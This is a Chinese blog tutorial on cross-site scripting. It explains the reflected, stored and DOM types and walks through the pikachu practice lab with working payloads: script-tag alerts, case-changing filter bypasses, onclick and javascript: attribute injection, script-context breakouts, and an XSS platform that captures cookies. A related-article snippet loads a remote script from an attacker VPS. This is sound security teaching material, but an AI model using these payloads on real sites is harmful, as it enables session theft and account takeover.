xss--跨站脚本攻击

最新推荐文章于 2024-06-13 16:47:01 发布
最新推荐文章于 2024-06-13 16:47:01 发布
阅读量2.3k 收藏 5
点赞数
文章标签: xss web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/klcyl_0106/article/details/124717912
版权

一、定义

攻击者在网页中嵌入恶意脚本代码(javascript),当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者目的。

二、原理

本质:可控变量,显示输出变量。代码在对数据进行显示出现的安全问题。——js代码
产生层面:前端。
函数类:输出型函数。
危害影响:受js代码影响。
浏览器内核版本:受对方浏览器版本限制,可能带有过滤。

三、危害

(1)窃取管理员帐号或cookie。入侵者可以冒充管理员的身份登录后台。使得入侵者具有恶意操纵后台数据的能力,包括读取、更改、添加、删除一些信息。
(2)网站挂马。先将恶意攻击代码嵌入到Web应用程序之中。当用户浏览该挂马页面时,用户的计算机会被植入木马。
(3)发送广告或者垃圾信息。攻击者可以利用XSS漏洞植入广告,或者发送垃圾信息,严重影响到用户的正常使用。
(4)重定向

四、分类

1.反射型XSS

非持久化,一般需要用户手动点进去攻击者伪造好的链接才能触发代码

2.存储型XSS

持久性,攻击者的XSS语句存储在服务数据库,当有受害者访问这个网页都会触发代码,一般在留言板,评论区页面经常出现。

3.DOM型XSS

DOM型xss与上面两种最大的区别就是,dom型xss漏洞是基于文档对象模型(Document Object Model,DOM)的,它不需要经过后端,它是在浏览器解析渲染服务器源码的时候产生的,所以我们在抓包的过程中是看不到dom型xss有关的内容的。

五、靶场练习

pikachu靶场

1. 反射型XSS(get)

在没有过滤的情况下在提交参数中插入XSS语句,页面会出现一个弹窗,并且再次访问该页面时网站不会出现弹窗。
输入语句:

<script>alert(‘xss’)</script>

输入的语句本来是显示在页面上的,其为js代码,浏览器将其执行,弹窗回显"xss":
在这里插入图片描述

2. 反射型xss(post)

登录:用户admin 密码123456
在这里插入图片描述成功登录:
在这里插入图片描述之后的操作和反射型xss(get)一致

3. 存储型XSS

代码会存储在数据库中,访问该网页会一直触发XSS代码。
输入语句:

<script>alert(‘xss’)</script>

在这里插入图片描述 点击提交,出现弹窗"xss":在这里插入图片描述点击确定:
在这里插入图片描述之后一直点击submit(访问该网页),就会一直回显xss弹窗(一直执行输入的代码)

4. DOM型XSS

可以看到我们输入的参数使用burp抓包没有抓到,说明DOM型XSS,只在前端产生。
输入语句:

<script>alert(‘xss’)</script>

在这里插入图片描述在这里插入图片描述并没有回显,查看:
在这里插入图片描述输入的语句被当作超链接了
查看页面源代码:
在这里插入图片描述
输入语句:'onclick=“alert('xss')”>,出现弹窗:
在这里插入图片描述onclick 事件会在对象被点击时发生,然后弹出我们的xss
注:遇到输入语句会被当作超链接的,即需要点击才可以回显,那么就要引入onclick事件(用法:οnclick=“”)

5. DOM型xss-x

同样输入<script>alert(‘xss’)</script>
在这里插入图片描述查看:
在这里插入图片描述发现输入语句还是被当作超链接。
输入

'οnclick="alert('xss')">

在这里插入图片描述点击链接,出现弹窗:
在这里插入图片描述

6.xss之盲打

XSS盲打简单来说,就是不知道后台有没有xss漏洞存在的情况下,不顾一切的输入xss代码在留言,反馈之类的地方,就叫盲打
首先还是老办法,输入常用语句:

<script>alert(‘xss’)</script>

在这里插入图片描述提交:
在这里插入图片描述并没有回显
估计是上传到后台去了,看看小贴士
在这里插入图片描述在这里插入图片描述输入用户密码(admin 123456)登录后台:
在这里插入图片描述回显了!

7.xss之过滤

输入常用语句,发现语句并没有被执行,被过滤掉了。
试一下大小写绕过的方法:输入

<sCriPt>alert('xss')</ScrIpt>

在这里插入图片描述回显了!

8.xss之htmlspecialchars

htmlspecialchars会过滤一些字符 在这里插入图片描述首先老方法:
在这里插入图片描述没回显,而且查看代码发现<和>都被过滤了,而且又是被当作超链接。(其实在这之前可以先输入常用的特殊字符,查看代码看是否被过滤。)
在这里插入图片描述可以看出这里是对单引号不转义
在这里插入图片描述
从php代码可以看到默认不对单引号做处理,也写着输入’onclick=’alert(111)’试试
所以还是用之前的onclick事件:
在这里插入图片描述回显了!

9. xss之href输出

老样子输入还是被当作超链接
在这里插入图片描述用onclick事件:
在这里插入图片描述还是不行
在这里插入图片描述从代码提示可以使用javascript协议来执行js
输入javascript:alert(‘xss’),可以看到没有任何过滤,成功弹窗
在这里插入图片描述

10. xss之js输出

在这里插入图片描述可以看出将我们输入的字符存到了js代码里面然后进行判断,写一个闭合

'</script><script>alert(/xss/)</script>

在这里插入图片描述回显了!

六、xss平台的使用

注册登录,创建项目test,并配置:
在这里插入图片描述会出现:
在这里插入图片描述将代码写入到pikachu靶场的xss漏洞部分,出现弹窗:
在这里插入图片描述平台获取到cookie信息:
在这里插入图片描述

kcllg
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss跨站脚本攻击
weixin_45798017的博客
10-17 351
XSS简介 (cross site script)为了避免和样式css混淆,所以叫xssxss是指恶意攻击者利用网站没有对用户提交的数据进行转义处理或者过滤不足,进而填加一些代码,嵌入web页面,使得用户访问都会执行嵌入的代码,从而盗取用户的资料信息,利用用户信息进行一系列的访问。 危害包括: 盗取各类用户账号,包括管理员的 控制企业数据,例如:读取,篡改,添加,删除敏感数据 盗取企业商业价...
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 405
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
xss知识点总结
weixin_45498459的博客
03-17 275
<script> alert(弹窗的值);</script> <script src="http://<yourVPS>/xss.js"></script>asd 在php中单引号中的变量是不被解析的,双引号中的变量和数组及常量是可以被解析的。 on事件大全 onactivate 当对象设置为活动元素时触发。 onafterprint 对象所关联的文档打印或打印预览后立即在对象上触发。 onbeforeactivate 对象要被设置..
跨站脚本攻击XSS
最新发布
weixin_44189802的博客
06-13 1800
XSS 全称是 Cross Site Scripting,为了与“CSS”区分开来,故简称 XSS,翻译过来就是“跨站脚本”。XSS 攻击是指黑客往 HTML 文件中或者 DOM 中注入恶意脚本,从而在用户浏览页面时利用注入的恶意脚本对用户实施攻击的一种手段。最开始的时候,这种攻击是通过跨域来实现的,所以叫“跨域脚本”。但是发展到现在,往 HTML 文件中注入恶意代码的方式越来越多了,所以是否跨域注入脚本已经不是唯一的注入手段了,但是 XSS 这个名字却一直保留至今。
xss漏洞学习
m0_49137360的博客
07-25 1410
xss学习
xsslabs练习
acepanhuan的博客
02-15 437
xsslabs
xss_labs通关教程
qq_48904485的博客
03-23 644
level1 1、url输入特殊字符判断位置 2、构造Payload /level1.php?name=</h2><script>alert("xss")</script> level2 1、url输入特殊字符判断位置 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BKe2fY6Q-1647921941027)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
XSS跨站脚本攻击
01-27
跨站脚本攻击XSS)是Web应用程序中常见的安全问题,主要源于开发人员未对用户提交的数据进行充分的过滤和转义。攻击者利用这一弱点,能够在网页中注入恶意脚本,使得其他用户在访问该页面时执行这些脚本,从而导致...
36-36.XSS跨站脚本攻击课程介绍.mp4
05-10
36-36.XSS跨站脚本攻击课程介绍.mp4
xss-labs-master.rar
05-09
3. 跨站请求伪造(CSRF):利用用户已登录状态发起恶意操作。 三、XSS防御策略 为了防止XSS攻击,开发者应遵循以下原则: 1. 输入验证:对用户提交的数据进行严格的过滤和转义,避免恶意脚本执行。 2. 输出编码:...
XSS跨站脚本攻击(level1-10)
不知名白帽的博客
05-31 2344
XSS(跨站请求伪造)level1-10关的题目讲解。
网络安全-跨站脚本攻击(XSS)的原理、攻击及防御
热门推荐
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss是攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
跨站脚本漏洞
weixin_46729085的博客
09-08 3757
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
IT知识百科:什么是跨站脚本(XSS)攻击?
网络技术联盟站
06-06 1217
跨站脚本(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,攻击者利用该漏洞在受害者的网页中插入恶意脚本,从而能够获取用户的敏感信息、劫持会话或进行其他恶意活动。本文将详细介绍跨站脚本攻击的原理、类型、常见漏洞场景以及防御措施。
跨站脚本攻击漏洞(XSS):基础知识和防御策略
weixin_43263566的博客
01-16 9673
跨站脚本攻击漏洞-基础篇
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值